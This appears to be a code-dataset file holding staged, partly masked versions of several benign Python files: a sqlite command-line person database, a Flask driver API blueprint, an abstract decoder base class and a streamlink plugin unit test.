"step-3": "<mask token>\nos.system('clear')\npersons = []\n\n\nclass Person:\n\n def __init__(self, name, surname, job, salary):\n self.name = name\n self.surname = surname\n self.job = job\n self.salary = salary\n\n\ndef create(name):\n conn = db.connect(name + '.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef database(s):\n conn = db.connect(sqldb + '.db')\n c = conn.cursor()\n c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.\n surname))\n c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (\n s.surname, s.job, s.salary))\n conn.commit()\n conn.close()\n\n\ndef insert():\n name = input('Enter your name: ')\n surname = input('Enter your surname: ')\n confirm = input('Have you got a job? ')\n if 'y' in confirm:\n job = input('What kind of job you have? ')\n salary = input('How much they pay for you? ')\n surname = Person(name, surname, job, salary)\n persons.append(surname)\n database(surname)\n else:\n print('We need a humans with job, bye')\n\n\nwhile True:\n command = input('>> ')\n if command == 'insert':\n insert()\n elif command == 'list':\n for i in persons:\n print(i.surname)\n continue\n elif command == 'create database':\n sqldb = input('Enter the name of new database: ')\n create(sqldb)\n elif command == 'clear' or command == 'cls':\n loc = os.getcwd()\n if 'C:' in loc or 'D:' in loc:\n os.system('cls')\n else:\n os.system('clear')\n else:\n print('No command found')\n continue\n",
"step-4": "import os\nimport sqlite3 as db\nos.system('clear')\npersons = []\n\n\nclass Person:\n\n def __init__(self, name, surname, job, salary):\n self.name = name\n self.surname = surname\n self.job = job\n self.salary = salary\n\n\ndef create(name):\n conn = db.connect(name + '.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\"\n )\n c.execute(\n \"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\"\n )\n conn.commit()\n conn.close()\n\n\ndef database(s):\n conn = db.connect(sqldb + '.db')\n c = conn.cursor()\n c.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.\n surname))\n c.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (\n s.surname, s.job, s.salary))\n conn.commit()\n conn.close()\n\n\ndef insert():\n name = input('Enter your name: ')\n surname = input('Enter your surname: ')\n confirm = input('Have you got a job? ')\n if 'y' in confirm:\n job = input('What kind of job you have? ')\n salary = input('How much they pay for you? ')\n surname = Person(name, surname, job, salary)\n persons.append(surname)\n database(surname)\n else:\n print('We need a humans with job, bye')\n\n\nwhile True:\n command = input('>> ')\n if command == 'insert':\n insert()\n elif command == 'list':\n for i in persons:\n print(i.surname)\n continue\n elif command == 'create database':\n sqldb = input('Enter the name of new database: ')\n create(sqldb)\n elif command == 'clear' or command == 'cls':\n loc = os.getcwd()\n if 'C:' in loc or 'D:' in loc:\n os.system('cls')\n else:\n os.system('clear')\n else:\n print('No command found')\n continue\n",
"step-5": "import os\nimport sqlite3 as db\n\nos.system('clear')\npersons = []\n\nclass Person:\n\tdef __init__(self, name, surname, job, salary):\n\t\tself.name = name\n\t\tself.surname = surname\n\t\tself.job = job\n\t\tself.salary = salary\n\ndef create(name):\n\tconn = db.connect(name + '.db')\n\tc = conn.cursor()\n\n\tc.execute(\"\"\"CREATE TABLE first(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tname text,\n\t\t\tsurname text\n\t\t)\"\"\")\n\n\tc.execute(\"\"\"CREATE TABLE second(\n\t\t\tid integer PRIMARY KEY AUTOINCREMENT,\n\t\t\tsurname text,\n\t\t\tjob text,\n\t\t\tsalary integer,\n\t\t\tFOREIGN KEY(id) REFERENCES first(id),\n\t\t\tFOREIGN KEY(surname) REFERENCES first(surname)\n\t\t)\"\"\")\n\n\tconn.commit()\n\tconn.close()\t\n\ndef database(s):\n\tconn = db.connect(sqldb+'.db')\n\tc = conn.cursor()\n\tc.execute('INSERT INTO first(name, surname) VALUES(?, ?)', (s.name, s.surname))\n\tc.execute('INSERT INTO second(surname, job, salary) VALUES(?, ?, ?)', (s.surname, s.job, s.salary))\n\tconn.commit()\n\tconn.close()\n\ndef insert():\n\tname = input('Enter your name: ')\n\tsurname = input('Enter your surname: ')\n\tconfirm = input('Have you got a job? ')\n\tif 'y' in confirm:\n\t\tjob = input('What kind of job you have? ')\n\t\tsalary = input('How much they pay for you? ')\n\t\tsurname = Person(name, surname, job, salary)\n\t\tpersons.append(surname)\n\t\tdatabase(surname)\n\telse:\n\t\tprint('We need a humans with job, bye')\n\n\nwhile True:\n\tcommand = input(\">> \")\n\tif command == 'insert':\n\t\tinsert()\n\telif command == 'list':\n\t\tfor i in persons:\n\t\t\tprint(i.surname)\n\t\tcontinue\n\telif command == 'create database':\n\t\tsqldb = input('Enter the name of new database: ')\n\t\tcreate(sqldb)\n\telif command == 'clear' or command == 'cls':\n\t\tloc = os.getcwd()\n\t\tif 'C:' in loc or 'D:' in loc:\n\t\t\tos.system('cls')\n\t\telse:\n\t\t\tos.system('clear')\n\telse:\n\t\tprint('No command found')\n\t\tcontinue",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
<|reserved_special_token_0|>
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
<|reserved_special_token_0|>
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(mimetype='application/json', response=json.dumps(
response), status=status_code)
<|reserved_special_token_1|>
from flask import request, json, Response, Blueprint
from ..models.DriverModel import DriverModel, DriverSchema
driver_api = Blueprint('drivers', __name__)
driver_schema = DriverSchema()
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(mimetype='application/json', response=json.dumps(
response), status=status_code)
<|reserved_special_token_1|>
from flask import request, json, Response, Blueprint
from ..models.DriverModel import DriverModel, DriverSchema
driver_api = Blueprint('drivers', __name__)
driver_schema = DriverSchema()
@driver_api.route('/', methods=['POST'])
def create():
req_data = request.get_json()
data, error = driver_schema.load(req_data)
if error:
return custom_response(error, 400)
driver_in_db = DriverModel.get_driver_by_name(data.get('name'))
if driver_in_db:
return custom_response({'Error': 'Driver already exist.'}, 400)
driver = DriverModel(data)
driver.save()
response = driver_schema.dump(driver).data
return custom_response(response, 201)
@driver_api.route('/<int:driver_id>', methods=['GET'])
def get(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 404)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['PUT'])
def update(driver_id):
req_data = request.get_json()
data, error = driver_schema.load(req_data, partial=True)
if error:
return custom_response({'Error': 'Driver not found.'}, 400)
driver = DriverModel.get_one_driver(driver_id)
driver.update(data)
response = driver_schema.dump(driver).data
return custom_response(response, 200)
@driver_api.route('/<int:driver_id>', methods=['DELETE'])
def delete(driver_id):
driver = DriverModel.get_one_driver(driver_id)
if not driver:
return custom_response({'Error': 'Driver not found.'}, 400)
driver.delete()
return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)
@driver_api.route('/list_not_loaded', methods=['GET'])
def list_truck_not_loaded():
driver = DriverModel.truck_not_loaded()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
@driver_api.route('/list_trucks_owned', methods=['GET'])
def list_truck_owned():
driver = DriverModel.truck_owned()
response = driver_schema.dump(driver, many=True).data
return custom_response(response, 200)
def custom_response(response, status_code):
return Response(
mimetype="application/json",
response=json.dumps(response),
status=status_code
)
|
flexible
|
{
"blob_id": "ee7820d50b5020a787fbaf012480e8c70bc0ee41",
"index": 1690,
"step-1": "<mask token>\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n<mask token>\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@driver_api.route('/', methods=['POST'])\ndef create():\n req_data = request.get_json()\n data, error = driver_schema.load(req_data)\n if error:\n return custom_response(error, 400)\n driver_in_db = DriverModel.get_driver_by_name(data.get('name'))\n if driver_in_db:\n return custom_response({'Error': 'Driver already exist.'}, 400)\n driver = DriverModel(data)\n driver.save()\n response = driver_schema.dump(driver).data\n return custom_response(response, 201)\n\n\n<mask token>\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['DELETE'])\ndef delete(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver.delete()\n return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/list_trucks_owned', methods=['GET'])\ndef list_truck_owned():\n driver = DriverModel.truck_owned()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@driver_api.route('/', methods=['POST'])\ndef create():\n req_data = request.get_json()\n data, error = driver_schema.load(req_data)\n if error:\n return custom_response(error, 400)\n driver_in_db = DriverModel.get_driver_by_name(data.get('name'))\n if driver_in_db:\n return custom_response({'Error': 'Driver already exist.'}, 400)\n driver = DriverModel(data)\n driver.save()\n response = driver_schema.dump(driver).data\n return custom_response(response, 201)\n\n\n@driver_api.route('/<int:driver_id>', methods=['GET'])\ndef get(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 404)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['DELETE'])\ndef delete(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver.delete()\n return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/list_trucks_owned', methods=['GET'])\ndef list_truck_owned():\n driver = DriverModel.truck_owned()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\ndef custom_response(response, status_code):\n return Response(mimetype='application/json', response=json.dumps(\n response), status=status_code)\n",
"step-4": "from flask import request, json, Response, Blueprint\nfrom ..models.DriverModel import DriverModel, DriverSchema\ndriver_api = Blueprint('drivers', __name__)\ndriver_schema = DriverSchema()\n\n\n@driver_api.route('/', methods=['POST'])\ndef create():\n req_data = request.get_json()\n data, error = driver_schema.load(req_data)\n if error:\n return custom_response(error, 400)\n driver_in_db = DriverModel.get_driver_by_name(data.get('name'))\n if driver_in_db:\n return custom_response({'Error': 'Driver already exist.'}, 400)\n driver = DriverModel(data)\n driver.save()\n response = driver_schema.dump(driver).data\n return custom_response(response, 201)\n\n\n@driver_api.route('/<int:driver_id>', methods=['GET'])\ndef get(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 404)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['DELETE'])\ndef delete(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 400)\n driver.delete()\n return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/list_trucks_owned', methods=['GET'])\ndef list_truck_owned():\n driver = DriverModel.truck_owned()\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\ndef custom_response(response, status_code):\n return Response(mimetype='application/json', response=json.dumps(\n response), status=status_code)\n",
"step-5": "from flask import request, json, Response, Blueprint\nfrom ..models.DriverModel import DriverModel, DriverSchema\n\ndriver_api = Blueprint('drivers', __name__)\ndriver_schema = DriverSchema()\n\n\n@driver_api.route('/', methods=['POST'])\ndef create():\n req_data = request.get_json()\n data, error = driver_schema.load(req_data)\n\n if error:\n return custom_response(error, 400)\n\n driver_in_db = DriverModel.get_driver_by_name(data.get('name'))\n if driver_in_db:\n return custom_response({'Error': 'Driver already exist.'}, 400)\n\n driver = DriverModel(data)\n driver.save()\n\n response = driver_schema.dump(driver).data\n return custom_response(response, 201)\n\n\n@driver_api.route('/<int:driver_id>', methods=['GET'])\ndef get(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 404)\n\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['PUT'])\ndef update(driver_id):\n req_data = request.get_json()\n data, error = driver_schema.load(req_data, partial=True)\n if error:\n return custom_response({'Error': 'Driver not found.'}, 400)\n\n driver = DriverModel.get_one_driver(driver_id)\n driver.update(data)\n\n response = driver_schema.dump(driver).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/<int:driver_id>', methods=['DELETE'])\ndef delete(driver_id):\n driver = DriverModel.get_one_driver(driver_id)\n if not driver:\n return custom_response({'Error': 'Driver not found.'}, 400)\n\n driver.delete()\n return custom_response({'Sucess': 'Driver deleted with sucess!'}, 200)\n\n\n@driver_api.route('/list_not_loaded', methods=['GET'])\ndef list_truck_not_loaded():\n driver = DriverModel.truck_not_loaded()\n\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\n@driver_api.route('/list_trucks_owned', methods=['GET'])\ndef list_truck_owned():\n driver = DriverModel.truck_owned()\n\n response = driver_schema.dump(driver, many=True).data\n return custom_response(response, 200)\n\n\ndef custom_response(response, status_code):\n return Response(\n mimetype=\"application/json\",\n response=json.dumps(response),\n status=status_code\n )\n",
"step-ids": [
2,
5,
7,
9,
10
]
}
|
[
2,
5,
7,
9,
10
] |
<|reserved_special_token_0|>
class DecoderBase(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
<|reserved_special_token_0|>
@abstractmethod
def loss(self, input_data):
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DecoderBase(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
<|reserved_special_token_0|>
@abstractmethod
def loss(self, input_data):
pass
@abstractmethod
def sequence_dist(self, input_data):
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DecoderBase(object):
<|reserved_special_token_0|>
__metaclass__ = ABCMeta
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
@abstractmethod
def predict(self, input_data):
pass
@abstractmethod
def loss(self, input_data):
pass
@abstractmethod
def sequence_dist(self, input_data):
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DecoderBase(object):
"""
Base model for decoder
"""
__metaclass__ = ABCMeta
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
@abstractmethod
def predict(self, input_data):
pass
@abstractmethod
def loss(self, input_data):
pass
@abstractmethod
def sequence_dist(self, input_data):
pass
<|reserved_special_token_1|>
#!/usr/bin/python3
# encoding: utf-8
"""
@author: ShuoChang
@license: (C) MIT.
@contact: [email protected]
@software: CRNN_STN_SEQ
@file: decoder_base.py
@time: 2019/7/22 17:21
@blog: https://www.zhihu.com/people/chang-shuo-59/activities
"""
from abc import ABCMeta
from abc import abstractmethod
class DecoderBase(object):
"""
Base model for decoder
"""
__metaclass__ = ABCMeta
def __init__(self):
self._predictor = 'decoder'
self._label = None
pass
@abstractmethod
def set_label(self, label):
self._label = label
@abstractmethod
def predict(self, input_data):
pass
@abstractmethod
def loss(self, input_data):
pass
@abstractmethod
def sequence_dist(self, input_data):
pass
|
flexible
|
{
"blob_id": "0d8a26ef4077b40e8255d5bb2ce9217b51118780",
"index": 7364,
"step-1": "<mask token>\n\n\nclass DecoderBase(object):\n <mask token>\n <mask token>\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n <mask token>\n\n @abstractmethod\n def loss(self, input_data):\n pass\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass DecoderBase(object):\n <mask token>\n <mask token>\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n <mask token>\n\n @abstractmethod\n def loss(self, input_data):\n pass\n\n @abstractmethod\n def sequence_dist(self, input_data):\n pass\n",
"step-3": "<mask token>\n\n\nclass DecoderBase(object):\n <mask token>\n __metaclass__ = ABCMeta\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n\n @abstractmethod\n def predict(self, input_data):\n pass\n\n @abstractmethod\n def loss(self, input_data):\n pass\n\n @abstractmethod\n def sequence_dist(self, input_data):\n pass\n",
"step-4": "<mask token>\n\n\nclass DecoderBase(object):\n \"\"\"\n Base model for decoder\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n\n @abstractmethod\n def predict(self, input_data):\n pass\n\n @abstractmethod\n def loss(self, input_data):\n pass\n\n @abstractmethod\n def sequence_dist(self, input_data):\n pass\n",
"step-5": "#!/usr/bin/python3\n# encoding: utf-8\n\"\"\"\n@author: ShuoChang\n@license: (C) MIT.\n@contact: [email protected]\n@software: CRNN_STN_SEQ\n@file: decoder_base.py\n@time: 2019/7/22 17:21\n@blog: https://www.zhihu.com/people/chang-shuo-59/activities\n\"\"\"\n\nfrom abc import ABCMeta\nfrom abc import abstractmethod\n\n\nclass DecoderBase(object):\n \"\"\"\n Base model for decoder\n \"\"\"\n __metaclass__ = ABCMeta\n\n def __init__(self):\n self._predictor = 'decoder'\n self._label = None\n pass\n\n @abstractmethod\n def set_label(self, label):\n self._label = label\n\n @abstractmethod\n def predict(self, input_data):\n pass\n\n @abstractmethod\n def loss(self, input_data):\n pass\n\n @abstractmethod\n def sequence_dist(self, input_data):\n pass\n",
"step-ids": [
4,
5,
7,
8,
10
]
}
|
[
4,
5,
7,
8,
10
] |
<|reserved_special_token_0|>
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group('Plugin Options').add_argument_group(
'FunimationNow')
session.plugins = {'funimationnow': FunimationNow}
setup_plugin_args(session, parser)
self.assertSequenceEqual(group.add_argument.mock_calls, [call(
'--funimation-email', help=ANY), call('--funimation-password',
help=ANY), call('--funimation-language', choices=['en', 'ja',
'english', 'japanese'], default='english', help=ANY)])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group('Plugin Options').add_argument_group(
'FunimationNow')
session.plugins = {'funimationnow': FunimationNow}
setup_plugin_args(session, parser)
self.assertSequenceEqual(group.add_argument.mock_calls, [call(
'--funimation-email', help=ANY), call('--funimation-password',
help=ANY), call('--funimation-language', choices=['en', 'ja',
'english', 'japanese'], default='english', help=ANY)])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):
__plugin__ = FunimationNow
should_match = ['http://www.funimation.com/anything',
'http://www.funimation.com/anything123',
'http://www.funimationnow.uk/anything',
'http://www.funimationnow.uk/anything123']
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group('Plugin Options').add_argument_group(
'FunimationNow')
session.plugins = {'funimationnow': FunimationNow}
setup_plugin_args(session, parser)
self.assertSequenceEqual(group.add_argument.mock_calls, [call(
'--funimation-email', help=ANY), call('--funimation-password',
help=ANY), call('--funimation-language', choices=['en', 'ja',
'english', 'japanese'], default='english', help=ANY)])
<|reserved_special_token_1|>
import unittest
from unittest.mock import ANY, MagicMock, call
from streamlink import Streamlink
from streamlink.plugins.funimationnow import FunimationNow
from tests.plugins import PluginCanHandleUrl
class TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):
__plugin__ = FunimationNow
should_match = ['http://www.funimation.com/anything',
'http://www.funimation.com/anything123',
'http://www.funimationnow.uk/anything',
'http://www.funimationnow.uk/anything123']
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group('Plugin Options').add_argument_group(
'FunimationNow')
session.plugins = {'funimationnow': FunimationNow}
setup_plugin_args(session, parser)
self.assertSequenceEqual(group.add_argument.mock_calls, [call(
'--funimation-email', help=ANY), call('--funimation-password',
help=ANY), call('--funimation-language', choices=['en', 'ja',
'english', 'japanese'], default='english', help=ANY)])
<|reserved_special_token_1|>
import unittest
from unittest.mock import ANY, MagicMock, call
from streamlink import Streamlink
from streamlink.plugins.funimationnow import FunimationNow
from tests.plugins import PluginCanHandleUrl
class TestPluginCanHandleUrlFunimationNow(PluginCanHandleUrl):
__plugin__ = FunimationNow
should_match = [
"http://www.funimation.com/anything",
"http://www.funimation.com/anything123",
"http://www.funimationnow.uk/anything",
"http://www.funimationnow.uk/anything123",
]
class TestPluginFunimationNow(unittest.TestCase):
def test_arguments(self):
from streamlink_cli.main import setup_plugin_args
session = Streamlink()
parser = MagicMock()
group = parser.add_argument_group("Plugin Options").add_argument_group("FunimationNow")
session.plugins = {
'funimationnow': FunimationNow
}
setup_plugin_args(session, parser)
self.assertSequenceEqual(
group.add_argument.mock_calls,
[
call('--funimation-email', help=ANY),
call('--funimation-password', help=ANY),
call('--funimation-language', choices=["en", "ja", "english", "japanese"], default="english", help=ANY)
]
)
|
flexible
|
{
"blob_id": "266add60be2b6c2de5d53504cbabf754aa62d1b0",
"index": 9806,
